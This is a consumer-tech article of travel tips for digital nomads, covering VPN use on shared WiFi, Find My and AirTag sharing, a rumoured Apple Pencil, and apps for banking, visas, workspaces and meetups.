In today’s era of remote work and travel, having the right technology can make all the difference for digital nomads. Apple’s innovative products have become indispensable tools for those who live and work on the move.

At the same time, making the move to working remotely abroad is a daunting step. These tech add-ons and Apple hacks make the journey easier than ever.

****Security****

With even major co-working spaces like WeWork reporting huge data thefts from their open WiFi networks, it’s best to have another layer of security when working in shared spaces abroad. 

Downloading reliable protective solutions like ExpressVPN for Mac protects data by tunnelling it anonymously past shared networks, concealing from view any vulnerable account data that may be used for card theft and identity fraud. This feature also means the user’s location is hidden, allowing them to stay protected anywhere in the world they are working at the time. 

Getting the best out of iCloud’s FindMy features will put any digital nomad’s mind at ease when working from cafés abroad and bringing their tech to low-security spots. 

A new development for iOS17 is the ability to use AirTag with multiple Apple IDs. This feature allows the owner to share an AirTag’s location with someone else so they can keep an eye on it, too, acting as a double layer of backup that’s a huge help if the owner’s FindMy device is also missing. 

Designers can rejoice, as Apple also looks set to add one of the most used bits of hardware by digital nomads to its FindMy roster very soon: the Apple Pencil. The upcoming 3rd generation of the Apple Pencil is rumoured to have some new useful features, too, including the ability to zoom with a simple movement of the device. There are even hints, judging from recent Apple patents, at the ability of the new pencil to scan colours from the physical surroundings and replicate the same colour onto the iPad. 

****Before You Go****

Making sure you have financial freedom on the go is key to living the remote lifestyle, with cards like Revolut being the most favoured option for digital nomads. These offer an international banking experience, bypassing huge money transfer fees and the bureaucracy of moving funds between national banks. 

Digital nomads are a tech-dominated cohort, so it’s not unexpected that they’ve created a platform tailored to their needs. Inspired by Reddit, which also has forums dedicated to remote working, Citizen Remote is a relatively new app aiming to cover the whole breadth of the digital nomad experience. Users can do everything from getting started on Visa applications to connecting with collaborators on their next work project. 

****On The Go****

Co-working spaces can be expensive, and the transient nature of working abroad can make some subscriptions to these a little pointless. There are great alternatives, and WorkFrom provides a detailed database of the ones best set up for working travellers. Whether you need a guaranteed plug or just a space with great Wifi, this app can lead you in the right direction from libraries to cafés, complete with local reviews. 

Finally, no digital nomad lifestyle would be complete without the plethora of social connections that working in an international community brings. MeetUp is the biggest database for this, with subgroups for shared interests and languages spoken. It may seem old-school, but some cities have digital nomad communities that rely heavily on MeetUp. So it’s always worth checking it out to get the absolute most out of the social opportunities around.

1.  7 Times Apple Watch Saved Lives
2.  Is it possible to use an external SSD to speed up your Mac?
3.  Print on Demand Power: Tech Accessories Driving Shopify Sales
4.  Software Tech – Why You Need to Amp Up Onboarding Experience
5.  Apple Bug bounty: Earn big backs for hacking iPhone, other products

Tag

#apple